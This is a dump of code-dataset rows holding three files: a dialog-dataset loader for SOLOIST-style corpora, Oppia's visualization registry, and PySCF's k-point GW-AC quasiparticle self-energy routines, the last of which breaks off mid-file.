'hospital', 'police', 'rentalcar', 'flight', 'hotels',
'restaurant-search', 'flights']
DATASETS_PATH = os.path.join(os.path.expanduser(os.environ.get('DATASETS_PATH', '~/datasets')), 'soloist')
logger = logging.getLogger()
def load_dataset(name, restrict_domains=False, augment='disabled', use_blacklist=False, **kwargs):
    """Load a dialog dataset by name; "a+b" loads a concatenation of both.

    NOTE(review): ``augment`` is accepted but never used here, and the
    ``split_name(name)`` result below is discarded — confirm intent.
    """
    if restrict_domains:
        return load_dataset(name, domains=RESTRICTED_DOMAINS, **kwargs)
    if '+' in name:
        # This is a concat dataset
        datasets = name.split('+')
        _load_dataset = functools.partial(load_dataset, **kwargs)
        datasets = list(map(_load_dataset, datasets))
        return ConcatDialogDataset(datasets)
    dataset_name, split = split_name(name)  # result unused
    from data.dataset import load_dataset as load_custom_dataset
    dataset = load_custom_dataset(name, **kwargs)
    if use_blacklist:
        dataset = add_blacklist(dataset, name)
    return dataset
def add_blacklist(dataset, name):
    """Wrap *dataset* so the examples listed in its split's blacklist file are skipped."""
    dataset_name, split = split_name(name)
    # The blacklist file holds one integer example index per line.
    with open(os.path.join(DATASETS_PATH, dataset_name, f'{split}-blacklist.txt'), 'r') as f:
        blacklist = sorted(set(int(x.rstrip()) for x in f))
    logging.warning(f'Some examples ({100 * len(blacklist) / len(dataset):.2f}%) were ignored by a blacklist.')
    return wrap_dataset_with_blacklist(dataset, blacklist)
def load_backtranslation_transformation(name):
    """Build a back-translation augmentation for the dataset(s) named by *name*."""
    import data.backtranslation

    def get_backtranslation_datasets(name):
        # Recursively expand "a+b" names into a flat list of dataset names.
        if '+' in name:
            datasets = name.split('+')
            return sum(map(get_backtranslation_datasets, datasets), [])
        if name.endswith('.yaml'):
            return [name]
        new_name, split = split_name(name)
        # Strip a recognised split suffix so lookups use the bare dataset name.
        if split in {'dev', 'val', 'train', 'test', 'validation', 'training', 'testing', 'development'}:
            name = new_name
        if name == 'multiwoz-2.0':
            # NOTE: we do not have backtranslations for MultiWOZ 2.0
            return ['multiwoz-2.1']
        return [name]
    backtranslation_dict = data.backtranslation.load_backtranslations(list(set(get_backtranslation_datasets(name))))
    return data.backtranslation.BackTranslateAugmentation(backtranslation_dict)
|
import os
import functools
import logging
from data.utils import ConcatDialogDataset, split_name, wrap_dataset_with_blacklist
RESTRICTED_DOMAINS = ['hotel', 'train', 'restaurant', 'attraction', 'taxi',
'hospital', 'police', 'rentalcar', 'flight', 'hotels',
'restaurant-search', 'flights']
DATASETS_PATH = os.path.join(os.path.expanduser(os.environ.get('DATASETS_PATH', '~/datasets')), 'soloist')
logger = logging.getLogger()
def load_dataset(name, restrict_domains=False, augment='disabled', use_blacklist=False, **kwargs):
    """Load a dialog dataset by name; "a+b" loads a concatenation of both.

    NOTE(review): ``augment`` is accepted but never used here, and the
    ``split_name(name)`` result below is discarded — confirm intent.
    """
    if restrict_domains:
        return load_dataset(name, domains=RESTRICTED_DOMAINS, **kwargs)
    if '+' in name:
        # This is a concat dataset
        datasets = name.split('+')
        _load_dataset = functools.partial(load_dataset, **kwargs)
        datasets = list(map(_load_dataset, datasets))
        return ConcatDialogDataset(datasets)
    dataset_name, split = split_name(name)  # result unused
    from data.dataset import load_dataset as load_custom_dataset
    dataset = load_custom_dataset(name, **kwargs)
    if use_blacklist:
        dataset = add_blacklist(dataset, name)
    return dataset
def add_blacklist(dataset, name):
    """Wrap *dataset* so the examples listed in its split's blacklist file are skipped."""
    dataset_name, split = split_name(name)
    # The blacklist file holds one integer example index per line.
    with open(os.path.join(DATASETS_PATH, dataset_name, f'{split}-blacklist.txt'), 'r') as f:
        blacklist = sorted(set(int(x.rstrip()) for x in f))
    logging.warning(f'Some examples ({100 * len(blacklist) / len(dataset):.2f}%) were ignored by a blacklist.')
    return wrap_dataset_with_blacklist(dataset, blacklist)
def load_backtranslation_transformation(name):
    """Build a back-translation augmentation for the dataset(s) named by *name*."""
    import data.backtranslation

    def get_backtranslation_datasets(name):
        # Recursively expand "a+b" names into a flat list of dataset names.
        if '+' in name:
            datasets = name.split('+')
            return sum(map(get_backtranslation_datasets, datasets), [])
        if name.endswith('.yaml'):
            return [name]
        new_name, split = split_name(name)
        # Strip a recognised split suffix so lookups use the bare dataset name.
        if split in {'dev', 'val', 'train', 'test', 'validation', 'training', 'testing', 'development'}:
            name = new_name
        if name == 'multiwoz-2.0':
            # NOTE: we do not have backtranslations for MultiWOZ 2.0
            return ['multiwoz-2.1']
        return [name]
    backtranslation_dict = data.backtranslation.load_backtranslations(list(set(get_backtranslation_datasets(name))))
    return data.backtranslation.BackTranslateAugmentation(backtranslation_dict)
|
en
| 0.743111
|
# This is a concat dataset # NOTE: we do not have backtranslations for MultiWOZ 2.0
| 2.365214
| 2
|
core/domain/visualization_registry.py
|
aadilmehdis/oppia
| 1
|
6628089
|
<filename>core/domain/visualization_registry.py
# coding: utf-8
#
# Copyright 2014 The Oppia Authors. All Rights Reserved.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS-IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
"""Registry for visualizations."""
import inspect
import os
from extensions.visualizations import models
import feconf
import utils
class Registry(object):
    """Registry of all visualizations."""

    # Dict mapping visualization class names to their classes.
    visualizations_dict = {}

    @classmethod
    def _refresh_registry(cls):
        """Rebuild the registry from extensions.visualizations.models."""
        cls.visualizations_dict.clear()
        # Add new visualization instances to the registry.
        for name, clazz in inspect.getmembers(models, inspect.isclass):
            if name.endswith('_test') or name == 'BaseVisualization':
                continue
            ancestor_names = [
                base_class.__name__ for base_class in inspect.getmro(clazz)]
            # Only subclasses of BaseVisualization are registered.
            if 'BaseVisualization' not in ancestor_names:
                continue
            cls.visualizations_dict[clazz.__name__] = clazz

    @classmethod
    def get_full_html(cls):
        """Returns the HTML bodies for all visualizations."""
        js_directives = utils.get_file_contents(os.path.join(
            feconf.VISUALIZATIONS_DIR, 'visualizations.js'))
        return '<script>%s</script>\n' % (js_directives)

    @classmethod
    def get_visualization_class(cls, visualization_id):
        """Gets a visualization class by its id (which is also its class name).

        The registry will refresh if the desired class is not found. If it's
        still not found after the refresh, this method will throw an error.
        """
        if visualization_id not in cls.visualizations_dict:
            cls._refresh_registry()
        if visualization_id not in cls.visualizations_dict:
            raise TypeError(
                '\'%s\' is not a valid visualization id.' % visualization_id)
        return cls.visualizations_dict[visualization_id]

    @classmethod
    def get_all_visualization_ids(cls):
        """Returns the ids (class names) of all registered visualizations,
        refreshing the registry first if it is empty.
        """
        if not cls.visualizations_dict:
            cls._refresh_registry()
        return cls.visualizations_dict.keys()
|
<filename>core/domain/visualization_registry.py
# coding: utf-8
#
# Copyright 2014 The Oppia Authors. All Rights Reserved.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS-IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
"""Registry for visualizations."""
import inspect
import os
from extensions.visualizations import models
import feconf
import utils
class Registry(object):
    """Registry of all visualizations."""

    # Dict mapping visualization class names to their classes.
    visualizations_dict = {}

    @classmethod
    def _refresh_registry(cls):
        """Rebuild the registry from extensions.visualizations.models."""
        cls.visualizations_dict.clear()
        # Add new visualization instances to the registry.
        for name, clazz in inspect.getmembers(models, inspect.isclass):
            if name.endswith('_test') or name == 'BaseVisualization':
                continue
            ancestor_names = [
                base_class.__name__ for base_class in inspect.getmro(clazz)]
            # Only subclasses of BaseVisualization are registered.
            if 'BaseVisualization' not in ancestor_names:
                continue
            cls.visualizations_dict[clazz.__name__] = clazz

    @classmethod
    def get_full_html(cls):
        """Returns the HTML bodies for all visualizations."""
        js_directives = utils.get_file_contents(os.path.join(
            feconf.VISUALIZATIONS_DIR, 'visualizations.js'))
        return '<script>%s</script>\n' % (js_directives)

    @classmethod
    def get_visualization_class(cls, visualization_id):
        """Gets a visualization class by its id (which is also its class name).

        The registry will refresh if the desired class is not found. If it's
        still not found after the refresh, this method will throw an error.
        """
        if visualization_id not in cls.visualizations_dict:
            cls._refresh_registry()
        if visualization_id not in cls.visualizations_dict:
            raise TypeError(
                '\'%s\' is not a valid visualization id.' % visualization_id)
        return cls.visualizations_dict[visualization_id]

    @classmethod
    def get_all_visualization_ids(cls):
        """Returns the ids (class names) of all registered visualizations,
        refreshing the registry first if it is empty.
        """
        if not cls.visualizations_dict:
            cls._refresh_registry()
        return cls.visualizations_dict.keys()
|
en
| 0.898718
|
# coding: utf-8 # # Copyright 2014 The Oppia Authors. All Rights Reserved. # # Licensed under the Apache License, Version 2.0 (the "License"); # you may not use this file except in compliance with the License. # You may obtain a copy of the License at # # http://www.apache.org/licenses/LICENSE-2.0 # # Unless required by applicable law or agreed to in writing, software # distributed under the License is distributed on an "AS-IS" BASIS, # WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. # See the License for the specific language governing permissions and # limitations under the License. Registry for visualizations. Registry of all visualizations. # Dict mapping visualization class names to their classes. # Add new visualization instances to the registry. Returns the HTML bodies for all visualizations. Gets a visualization class by its id (which is also its class name). The registry will refresh if the desired class is not found. If it's still not found after the refresh, this method will throw an error. Gets a visualization class by its id (which is also its class name).
| 1.943548
| 2
|
pyscf/pbc/gw/krgw_ac.py
|
mfkasim1/pyscf
| 1
|
6628090
|
#!/usr/bin/env python
# Copyright 2014-2020 The PySCF Developers. All Rights Reserved.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
#
# Author: <NAME> <<EMAIL>>
#
'''
PBC spin-restricted G0W0-AC QP eigenvalues with k-point sampling
This implementation has N^4 scaling, and is faster than GW-CD (N^4)
and analytic GW (N^6) methods.
GW-AC is recommended for valence states only, and is inaccuarate for core states.
Method:
See <NAME> and <NAME>, arxiv:2007.03148 (2020) for details
Compute Sigma on imaginary frequency with density fitting,
then analytically continued to real frequency.
Gaussian density fitting must be used (FFTDF and MDF are not supported).
'''
from functools import reduce
import time
import numpy
import numpy as np
import h5py
from scipy.optimize import newton, least_squares
from pyscf import lib
from pyscf.lib import logger
from pyscf.ao2mo import _ao2mo
from pyscf.ao2mo.incore import _conc_mos
from pyscf.pbc import df, dft, scf
from pyscf.pbc.mp.kmp2 import get_nocc, get_nmo, get_frozen_mask
from pyscf import __config__
# Short module-level alias used throughout this file.
einsum = lib.einsum
def kernel(gw, mo_energy, mo_coeff, orbs=None,
           kptlist=None, nw=None, verbose=logger.NOTE):
    '''GW-corrected quasiparticle orbital energies.

    Args:
        gw: the KRGWAC object driving the calculation (supplies _scf,
            nmo, nocc, nkpts, with_df, ac, fc, linearized, ...).
        mo_energy, mo_coeff: mean-field orbital energies/coefficients.
        orbs: orbital indices to correct (default: all).
        kptlist: k-points to correct (default: all).
        nw: number of imaginary-frequency quadrature points.

    Returns:
        A list : converged, mo_energy, mo_coeff
    '''
    mf = gw._scf
    # Frozen orbitals are not supported by this implementation.
    if gw.frozen is None:
        frozen = 0
    else:
        frozen = gw.frozen
    assert (frozen == 0)
    if orbs is None:
        orbs = range(gw.nmo)
    if kptlist is None:
        kptlist = range(gw.nkpts)
    nkpts = gw.nkpts
    nklist = len(kptlist)
    norbs = len(orbs)

    # v_xc: mean-field exchange-correlation potential in the MO basis.
    dm = np.array(mf.make_rdm1())
    v_mf = np.array(mf.get_veff()) - np.array(mf.get_j(dm_kpts=dm))
    for k in range(nkpts):
        v_mf[k] = reduce(numpy.dot, (mo_coeff[k].T.conj(), v_mf[k], mo_coeff[k]))

    nocc = gw.nocc
    nmo = gw.nmo
    nvir = nmo-nocc

    # v_hf from DFT/HF density
    if gw.fc:
        exxdiv = 'ewald'
    else:
        exxdiv = None
    rhf = scf.KRHF(gw.mol, gw.kpts, exxdiv=exxdiv)
    rhf.with_df = gw.with_df
    if getattr(gw.with_df, '_cderi', None) is None:
        raise RuntimeError('Found incompatible integral scheme %s.'
                           'KGWAC can be only used with GDF integrals' %
                           gw.with_df.__class__)
    # Exchange matrix in the MO basis.
    vk = rhf.get_veff(gw.mol,dm_kpts=dm) - rhf.get_j(gw.mol,dm_kpts=dm)
    for k in range(nkpts):
        vk[k] = reduce(numpy.dot, (mo_coeff[k].T.conj(), vk[k], mo_coeff[k]))

    # Grids for integration on imaginary axis
    freqs,wts = _get_scaled_legendre_roots(nw)

    # Compute self-energy on imaginary axis i*[0,iw_cutoff]
    sigmaI, omega = get_sigma_diag(gw, orbs, kptlist, freqs, wts, iw_cutoff=5.)

    # Analytic continuation of the self-energy to the real axis.
    coeff = []
    if gw.ac == 'twopole':
        for k in range(nklist):
            coeff.append(AC_twopole_diag(sigmaI[k], omega, orbs, nocc))
    elif gw.ac == 'pade':
        for k in range(nklist):
            coeff_tmp, omega_fit = AC_pade_thiele_diag(sigmaI[k], omega)
            coeff.append(coeff_tmp)
    coeff = np.array(coeff)

    conv = True
    # This code does not support metals
    homo = -99.; lumo = 99.
    for k in range(nkpts):
        if homo < mf.mo_energy[k][nocc-1]:
            homo = mf.mo_energy[k][nocc-1]
        if lumo > mf.mo_energy[k][nocc]:
            lumo = mf.mo_energy[k][nocc]
    # Fermi level placed mid-gap.
    ef = (homo+lumo)/2.

    mo_energy = np.zeros_like(np.array(mf.mo_energy))
    for k in range(nklist):
        kn = kptlist[k]
        for p in orbs:
            if gw.linearized:
                # linearized G0W0: first-order Taylor expansion around ep.
                de = 1e-6
                ep = mf.mo_energy[kn][p]
                #TODO: analytic sigma derivative
                if gw.ac == 'twopole':
                    sigmaR = two_pole(ep-ef, coeff[k,:,p-orbs[0]]).real
                    dsigma = two_pole(ep-ef+de, coeff[k,:,p-orbs[0]]).real - sigmaR.real
                elif gw.ac == 'pade':
                    sigmaR = pade_thiele(ep-ef, omega_fit[p-orbs[0]], coeff[k,:,p-orbs[0]]).real
                    dsigma = pade_thiele(ep-ef+de, omega_fit[p-orbs[0]], coeff[k,:,p-orbs[0]]).real - sigmaR.real
                # Renormalization factor from the finite-difference derivative.
                zn = 1.0/(1.0-dsigma/de)
                e = ep + zn*(sigmaR.real + vk[kn,p,p].real - v_mf[kn,p,p].real)
                mo_energy[kn,p] = e
            else:
                # self-consistently solve QP equation
                def quasiparticle(omega):
                    if gw.ac == 'twopole':
                        sigmaR = two_pole(omega-ef, coeff[k,:,p-orbs[0]]).real
                    elif gw.ac == 'pade':
                        sigmaR = pade_thiele(omega-ef, omega_fit[p-orbs[0]], coeff[k,:,p-orbs[0]]).real
                    return omega - mf.mo_energy[kn][p] - (sigmaR.real + vk[kn,p,p].real - v_mf[kn,p,p].real)
                try:
                    # Newton's method from the mean-field energy as the initial guess.
                    e = newton(quasiparticle, mf.mo_energy[kn][p], tol=1e-6, maxiter=100)
                    mo_energy[kn,p] = e
                except RuntimeError:
                    conv = False
    mo_coeff = mf.mo_coeff

    if gw.verbose >= logger.DEBUG:
        numpy.set_printoptions(threshold=nmo)
        for k in range(nkpts):
            logger.debug(gw, ' GW mo_energy @ k%d =\n%s', k,mo_energy[k])
        numpy.set_printoptions(threshold=1000)

    return conv, mo_energy, mo_coeff
def get_rho_response(gw, omega, mo_energy, Lpq, kL, kidx):
    '''
    Compute density response function in auxiliary basis at freq iw.

    Lpq are the density-fitted 3-center integrals per k-point; kidx[i]
    maps k-point i to the momentum-conserving partner index a.
    '''
    nkpts, naux, nmo, nmo = Lpq.shape
    nocc = gw.nocc
    kpts = gw.kpts
    kscaled = gw.mol.get_scaled_kpts(kpts)
    kscaled -= kscaled[0]

    # Compute Pi for kL
    Pi = np.zeros((naux,naux),dtype=np.complex128)
    for i, kpti in enumerate(kpts):
        # Find ka that conserves with ki and kL (-ki+ka+kL=G)
        a = kidx[i]
        # Occupied-virtual energy denominators, folded for imaginary frequency.
        eia = mo_energy[i,:nocc,None] - mo_energy[a,None,nocc:]
        eia = eia/(omega**2+eia*eia)
        Pia = einsum('Pia,ia->Pia',Lpq[i][:,:nocc,nocc:],eia)
        # Response from both spin-up and spin-down density
        Pi += 4./nkpts * einsum('Pia,Qia->PQ',Pia,Lpq[i][:,:nocc,nocc:].conj())
    return Pi
def get_sigma_diag(gw, orbs, kptlist, freqs, wts, iw_cutoff=None, max_memory=8000):
    '''
    Compute GW correlation self-energy (diagonal elements)
    in MO basis on imaginary axis.

    Args:
        gw : KRGWAC object.
        orbs : orbital indices for which the self-energy is evaluated.
            NOTE(review): the occ/vir row split below (norbs_occ) assumes
            orbs lists its occupied entries first -- verify with callers.
        kptlist : k-point indices for the self-energy.
        freqs, wts : imaginary-frequency quadrature nodes and weights.
        iw_cutoff : keep only frequency points below this cutoff (plus w=0).
        max_memory : unused in this routine; kept for interface compatibility
            (gw._scf.max_memory is used for the DF read below).

    Returns:
        sigma : (nklist, norbs, nw_sigma) complex array Sigma_pp(i*omega).
        omega : (norbs, nw_sigma) per-orbital frequency grid
            (occupied: -i*w, virtual: +i*w).
    '''
    mo_energy = np.array(gw._scf.mo_energy)
    mo_coeff = np.array(gw._scf.mo_coeff)
    nocc = gw.nocc
    nmo = gw.nmo
    nkpts = gw.nkpts
    kpts = gw.kpts
    nklist = len(kptlist)
    nw = len(freqs)
    norbs = len(orbs)
    mydf = gw.with_df

    # possible kpts shift center
    kscaled = gw.mol.get_scaled_kpts(kpts)
    kscaled -= kscaled[0]

    # This code does not support metals: locate HOMO/LUMO over all k-points
    homo = -99.; lumo = 99.
    for k in range(nkpts):
        if homo < mo_energy[k][nocc-1]:
            homo = mo_energy[k][nocc-1]
        if lumo > mo_energy[k][nocc]:
            lumo = mo_energy[k][nocc]
    if (lumo-homo) < 1e-3:
        logger.warn(gw, 'This GW-AC code is not supporting metals!')
    # Fermi level placed mid-gap
    ef = (homo+lumo)/2.

    # Integration on numerical grids
    if iw_cutoff is not None:
        nw_sigma = sum(iw < iw_cutoff for iw in freqs) + 1
    else:
        nw_sigma = nw + 1

    # Compute occ for -iw and vir for iw separately
    # to avoid branch cuts in analytic continuation
    omega_occ = np.zeros((nw_sigma), dtype=np.complex128)
    omega_vir = np.zeros((nw_sigma), dtype=np.complex128)
    omega_occ[0] = 1j*0.; omega_occ[1:] = -1j*freqs[:(nw_sigma-1)]
    omega_vir[0] = 1j*0.; omega_vir[1:] = 1j*freqs[:(nw_sigma-1)]
    orbs_occ = [i for i in orbs if i < nocc]
    norbs_occ = len(orbs_occ)

    # emo_* = omega + ef - e_p, the denominators of G0 on the two branches
    emo_occ = np.zeros((nkpts, nmo, nw_sigma), dtype=np.complex128)
    emo_vir = np.zeros((nkpts, nmo, nw_sigma), dtype=np.complex128)
    for k in range(nkpts):
        emo_occ[k] = omega_occ[None, :] + ef - mo_energy[k][:, None]
        emo_vir[k] = omega_vir[None, :] + ef - mo_energy[k][:, None]

    sigma = np.zeros((nklist, norbs, nw_sigma), dtype=np.complex128)
    omega = np.zeros((norbs, nw_sigma), dtype=np.complex128)
    for p in range(norbs):
        orbp = orbs[p]
        if orbp < nocc:
            omega[p] = omega_occ.copy()
        else:
            omega[p] = omega_vir.copy()

    if gw.fc:
        # Set up q mesh for q->0 finite size correction
        q_pts = np.array([1e-3, 0, 0]).reshape(1, 3)
        nq_pts = len(q_pts)  # NOTE(review): unused
        q_abs = gw.mol.get_abs_kpts(q_pts)
        # Get qij = 1/sqrt(Omega) * < psi_{ik} | e^{iqr} | psi_{ak-q} > at q: (nkpts, nocc, nvir)
        qij = get_qij(gw, q_abs[0], mo_coeff)

    for kL in range(nkpts):
        # Lij: (ki, L, i, j) for looping every kL
        Lij = []
        # kidx: save kj that conserves with kL and ki (-ki+kj+kL=G)
        # kidx_r: save ki that conserves with kL and kj (-ki+kj+kL=G)
        kidx = np.zeros((nkpts), dtype=np.int64)
        kidx_r = np.zeros((nkpts), dtype=np.int64)
        for i, kpti in enumerate(kpts):
            for j, kptj in enumerate(kpts):
                # Find (ki,kj) that satisfies momentum conservation with kL
                kconserv = -kscaled[i] + kscaled[j] + kscaled[kL]
                is_kconserv = np.linalg.norm(np.round(kconserv) - kconserv) < 1e-12
                if is_kconserv:
                    kidx[i] = j
                    kidx_r[j] = i
                    logger.debug(gw, "Read Lpq (kL: %s / %s, ki: %s, kj: %s)"%(kL+1, nkpts, i, j))
                    Lij_out = None
                    # Read (L|pq) and ao2mo transform to (L|ij)
                    Lpq = []
                    for LpqR, LpqI, sign in mydf.sr_loop([kpti, kptj], max_memory=0.1*gw._scf.max_memory, compact=False):
                        Lpq.append(LpqR+LpqI*1.0j)
                    # support uneqaul naux on different k points
                    Lpq = np.vstack(Lpq).reshape(-1, nmo**2)
                    tao = []
                    ao_loc = None
                    moij, ijslice = _conc_mos(mo_coeff[i], mo_coeff[j])[2:]
                    Lij_out = _ao2mo.r_e2(Lpq, moij, ijslice, tao, ao_loc, out=Lij_out)
                    Lij.append(Lij_out.reshape(-1, nmo, nmo))
        Lij = np.asarray(Lij)
        naux = Lij.shape[1]

        if kL == 0:
            # kL = Gamma: optionally add head/wing finite-size corrections
            for w in range(nw):
                # body dielectric matrix eps_body
                Pi = get_rho_response(gw, freqs[w], mo_energy, Lij, kL, kidx)
                eps_body_inv = np.linalg.inv(np.eye(naux)-Pi)

                if gw.fc:
                    # head dielectric matrix eps_00
                    Pi_00 = get_rho_response_head(gw, freqs[w], mo_energy, qij)
                    eps_00 = 1. - 4. * np.pi/np.linalg.norm(q_abs[0])**2 * Pi_00

                    # wings dielectric matrix eps_P0
                    Pi_P0 = get_rho_response_wing(gw, freqs[w], mo_energy, Lij, qij)
                    eps_P0 = -np.sqrt(4.*np.pi) / np.linalg.norm(q_abs[0]) * Pi_P0

                    # inverse dielectric matrix (block inversion: head/wing/body)
                    eps_inv_00 = 1./(eps_00 - np.dot(np.dot(eps_P0.conj(), eps_body_inv), eps_P0))
                    eps_inv_P0 = -eps_inv_00 * np.dot(eps_body_inv, eps_P0)

                    # head correction
                    Del_00 = 2./np.pi * (6.*np.pi**2/gw.mol.vol/nkpts)**(1./3.) * (eps_inv_00 - 1.)

                eps_inv_PQ = eps_body_inv
                # quadrature-weighted G0 factors on the two frequency branches
                g0_occ = wts[w] * emo_occ / (emo_occ**2+freqs[w]**2)
                g0_vir = wts[w] * emo_vir / (emo_vir**2+freqs[w]**2)
                for k in range(nklist):
                    kn = kptlist[k]
                    # Find km that conserves with kn and kL (-km+kn+kL=G)
                    km = kidx_r[kn]
                    Qmn = einsum('Pmn,PQ->Qmn', Lij[km][:, :, orbs].conj(), eps_inv_PQ-np.eye(naux))
                    Wmn = 1./nkpts * einsum('Qmn,Qmn->mn', Qmn, Lij[km][:, :, orbs])
                    sigma[k][:norbs_occ] += -einsum('mn,mw->nw', Wmn[:, :norbs_occ], g0_occ[km])/np.pi
                    sigma[k][norbs_occ:] += -einsum('mn,mw->nw', Wmn[:, norbs_occ:], g0_vir[km])/np.pi

                    if gw.fc:
                        # apply head correction
                        assert(kn == km)
                        sigma[k][:norbs_occ] += -Del_00 * g0_occ[kn][orbs][:norbs_occ] /np.pi
                        sigma[k][norbs_occ:] += -Del_00 * g0_vir[kn][orbs][norbs_occ:] /np.pi

                        # apply wing correction
                        Wn_P0 = einsum('Pnm,P->nm', Lij[kn], eps_inv_P0).diagonal()
                        Wn_P0 = Wn_P0.real * 2.
                        Del_P0 = np.sqrt(gw.mol.vol/4./np.pi**3) * (6.*np.pi**2/gw.mol.vol/nkpts)**(2./3.) * Wn_P0[orbs]
                        sigma[k][:norbs_occ] += -einsum('n,nw->nw', Del_P0[:norbs_occ], g0_occ[kn][orbs][:norbs_occ]) /np.pi
                        sigma[k][norbs_occ:] += -einsum('n,nw->nw', Del_P0[norbs_occ:], g0_vir[kn][orbs][norbs_occ:]) /np.pi
        else:
            # kL != Gamma: plain body contribution only
            for w in range(nw):
                Pi = get_rho_response(gw, freqs[w], mo_energy, Lij, kL, kidx)
                Pi_inv = np.linalg.inv(np.eye(naux)-Pi)-np.eye(naux)
                g0_occ = wts[w] * emo_occ / (emo_occ**2+freqs[w]**2)
                g0_vir = wts[w] * emo_vir / (emo_vir**2+freqs[w]**2)
                for k in range(nklist):
                    kn = kptlist[k]
                    # Find km that conserves with kn and kL (-km+kn+kL=G)
                    km = kidx_r[kn]
                    Qmn = einsum('Pmn,PQ->Qmn', Lij[km][:, :, orbs].conj(), Pi_inv)
                    Wmn = 1./nkpts * einsum('Qmn,Qmn->mn', Qmn, Lij[km][:, :, orbs])
                    sigma[k][:norbs_occ] += -einsum('mn,mw->nw', Wmn[:, :norbs_occ], g0_occ[km])/np.pi
                    sigma[k][norbs_occ:] += -einsum('mn,mw->nw', Wmn[:, norbs_occ:], g0_vir[km])/np.pi

    return sigma, omega
def get_rho_response_head(gw, omega, mo_energy, qij):
    '''
    Compute head (G=0, G'=0) density response function in auxiliary basis at freq iw
    '''
    nkpts = qij.shape[0]
    nocc = gw.nocc
    head = 0j
    for ik, _kpt in enumerate(gw.kpts):
        de = mo_energy[ik, :nocc, None] - mo_energy[ik, None, nocc:]
        weight = de / (omega**2 + de * de)
        # factor 4/nkpts: response from both spin channels, k-point averaged
        head += 4. / nkpts * einsum('ia,ia->', weight, qij[ik].conj() * qij[ik])
    return head
def get_rho_response_wing(gw, omega, mo_energy, Lpq, qij):
    '''
    Compute wing (G=P, G'=0) density response function in auxiliary basis at freq iw
    '''
    nkpts = Lpq.shape[0]
    naux = Lpq.shape[1]
    nocc = gw.nocc
    wing = np.zeros(naux, dtype=np.complex128)
    for ik in range(len(gw.kpts)):
        de = mo_energy[ik, :nocc, None] - mo_energy[ik, None, nocc:]
        weight = (de / (omega**2 + de * de)) * qij[ik].conj()
        wing += 4. / nkpts * einsum('Pia,ia->P', Lpq[ik][:, :nocc, nocc:], weight)
    return wing
def get_qij(gw, q, mo_coeff, uniform_grids=False):
    '''
    Compute qij = 1/Omega * |< psi_{ik} | e^{iqr} | psi_{ak-q} >|^2 at q: (nkpts, nocc, nvir)
    through k.p perturbation theory.  Used for the q->0 finite-size
    (head/wing) corrections.
    Ref: Phys. Rev. B 83, 245122 (2011)

    Args:
        gw : GW object (reads nocc, nmo, kpts, mol and _scf.mo_energy).
        q : (3,) absolute q-vector near Gamma.
        mo_coeff : MO coefficients per k-point.
        uniform_grids : integrate on FFT uniform grids instead of Becke grids.

    Returns:
        qij : (nkpts, nocc, nvir) complex array.
    '''
    nocc = gw.nocc
    nmo = gw.nmo
    nvir = nmo - nocc
    kpts = gw.kpts
    nkpts = len(kpts)
    cell = gw.mol
    mo_energy = gw._scf.mo_energy

    if uniform_grids:
        mydf = df.FFTDF(cell, kpts=kpts)
        coords = cell.gen_uniform_grids(mydf.mesh)
    else:
        # Becke atomic grids for the real-space integration
        coords, weights = dft.gen_grid.get_becke_grids(cell, level=5)
    ngrid = len(coords)

    qij = np.zeros((nkpts, nocc, nvir), dtype=np.complex128)
    for i, kpti in enumerate(kpts):
        # AO values and gradients on the grid: ao_p[0] is the AO value,
        # ao_p[1:4] the x,y,z derivatives
        ao_p = dft.numint.eval_ao(cell, coords, kpt=kpti, deriv=1)
        ao = ao_p[0]
        ao_grad = ao_p[1:4]
        if uniform_grids:
            ao_ao_grad = einsum('mg,xgn->xmn', ao.T.conj(), ao_grad) * cell.vol / ngrid
        else:
            ao_ao_grad = einsum('g,mg,xgn->xmn', weights, ao.T.conj(), ao_grad)
        # q . <mu|grad|nu>, then transform to the occ x vir MO block
        q_ao_ao_grad = -1j * einsum('x,xmn->mn', q, ao_ao_grad)
        q_mo_mo_grad = np.dot(np.dot(mo_coeff[i][:, :nocc].T.conj(), q_ao_ao_grad), mo_coeff[i][:, nocc:])
        # k.p energy denominators 1/(e_a - e_i)
        enm = 1./(mo_energy[i][nocc:, None] - mo_energy[i][None, :nocc])
        dens = enm.T * q_mo_mo_grad
        qij[i] = dens / np.sqrt(cell.vol)
    return qij
def _get_scaled_legendre_roots(nw):
    """
    Scale nw Gauss-Legendre roots from [-1, 1] onto [0, inf)
    via the map x -> x0*(1+x)/(1-x).
    Ref: www.cond-mat.de/events/correl19/manuscripts/ren.pdf
    Returns:
        freqs : 1D ndarray
        wts : 1D ndarray
    """
    roots, weights = np.polynomial.legendre.leggauss(nw)
    x0 = 0.5
    scaled_roots = x0 * (1. + roots) / (1. - roots)
    # Jacobian of the map: 2*x0/(1-x)^2
    scaled_wts = weights * 2. * x0 / (1. - roots)**2
    return scaled_roots, scaled_wts
def _get_clenshaw_curtis_roots(nw):
    """
    Clenshaw-Curtis quadrature on [0, inf)
    Ref: J. Chem. Phys. 132, 234114 (2010)
    Returns:
        freqs : 1D ndarray
        wts : 1D ndarray
    """
    a = 0.2
    freqs = np.zeros(nw)
    wts = np.zeros(nw)
    for idx in range(nw):
        t = (idx + 1.0) / nw * np.pi / 2.
        freqs[idx] = a / np.tan(t)
        # the endpoint t = pi/2 carries half the interior weight
        factor = 4. if idx == nw - 1 else 2.
        wts[idx] = a * np.pi / factor / nw / (np.sin(t)**2)
    # return in ascending frequency order
    return freqs[::-1], wts[::-1]
def two_pole_fit(coeff, omega, sigma):
